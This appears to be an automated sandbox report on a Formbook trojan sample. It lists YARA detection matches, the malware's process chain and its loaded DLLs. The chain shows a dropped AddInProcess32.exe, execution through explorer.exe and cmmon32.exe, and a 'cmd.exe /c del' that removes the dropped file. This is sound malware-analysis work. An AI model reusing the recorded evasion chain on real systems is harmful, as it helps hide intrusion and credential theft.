          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.2682408997.000000000C39C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2373918036.0000000010F8D000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: VFylJFPzqX.exe PID: 7764, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: AddInProcess32.exe PID: 7984, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmmon32.exe PID: 8104, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/9@6/1
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VFylJFPzqX.exe.log
          Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4084
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe | File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\explorer.exe
          Source: VFylJFPzqX.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: VFylJFPzqX.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: VFylJFPzqX.exe | ReversingLabs: Detection: 73%
          Source: unknown | Process created: C:\Users\user\Desktop\VFylJFPzqX.exe "C:\Users\user\Desktop\VFylJFPzqX.exe"
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4084 -s 3228
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Users\user\Desktop\VFylJFPzqX.exe | Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: cmutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
